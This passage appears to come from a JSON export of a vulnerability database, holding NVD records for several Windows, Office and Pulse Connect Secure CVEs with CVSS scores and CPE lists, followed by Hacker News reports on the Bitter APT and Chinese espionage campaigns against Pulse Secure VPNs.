"2023-02-09T14:21:05", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31955", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-10T18:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-31955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31956", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:10", "description": "Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T17:15:00", "type": "cve", "title": "CVE-2021-22893", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-10-24T17:17:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure:9.1", "cpe:/a:pulsesecure:pulse_connect_secure:9.0"], "id": "CVE-2021-22893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r6:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r2.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.5:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r11.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r3.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r6.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r3:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r8:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r7:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r10.2:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r9:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r4.1:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.0:r5.0:*:*:*:*:*:*", "cpe:2.3:a:pulsesecure:pulse_connect_secure:9.1:r2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T15:37:12", "description": "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-12T14:59:00", "type": "cve", "title": "CVE-2017-0199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_7:*", "cpe:/a:microsoft:office:2016", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2010", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_vista:*"], "id": "CVE-2017-0199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:14:52", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-28310.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-27072", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-27072", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27072", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:16:20", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28310", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-28310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-12T02:22:45", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[![chinese hackers](https://thehackernews.com/images/-5_xyclMz6Yk/YLCbs0h4qJI/AAAAAAAACqc/R6kDUvjXi4UUR6-c9IT_Sv2oMonJRBTOgCLcBGAsYHQ/s728-e1000/chinese-hackers.jpg)](<https://thehackernews.com/images/-5_xyclMz6Yk/YLCbs0h4qJI/AAAAAAAACqc/R6kDUvjXi4UUR6-c9IT_Sv2oMonJRBTOgCLcBGAsYHQ/s0/chinese-hackers.jpg>)\n\nCybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks.\n\nFireEye's Mandiant threat intelligence team, which is tracking the cyber espionage activity under two activity clusters UNC2630 and UNC2717, [said](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>) the intrusions line up with key Chinese government priorities, adding \"many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent [14th Five Year Plan](<https://en.wikipedia.org/wiki/Five-year_plans_of_China#Fourteenth_plan_\$2021%E2%80%932025\$>).\"\n\nOn April 20, the cybersecurity firm [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by at least two cyber espionage groups believed to be affiliated with the Chinese government.\n\n * UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * UNC2717 - HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nFireEye's continued investigation into the attacks as part of its incident response efforts has uncovered four more malware families deployed by UNC2630 \u2014 BLOODMINE, BLOODBANK, CLEANPULSE, and RAPIDPULSE \u2014 for purposes of harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence.\n\n[![chinese hackers](https://thehackernews.com/images/-NSSEZWK9pjk/YLCaJqPCIUI/AAAAAAAACqU/AnObAGs5rNM92xF_myGkjOHr3neFaXDgQCLcBGAsYHQ/s728-e1000/data.jpg)](<https://thehackernews.com/images/-NSSEZWK9pjk/YLCaJqPCIUI/AAAAAAAACqU/AnObAGs5rNM92xF_myGkjOHr3neFaXDgQCLcBGAsYHQ/s0/data.jpg>)\n\nIn addition, the threat actors were also observed removing web shells, ATRIUM, and SLIGHTPULSE, from dozens of compromised VPN devices between April 17 and April 20 in what the researchers describe as \"unusual,\" suggesting \"this action displays an interesting concern for operational security and a sensitivity to 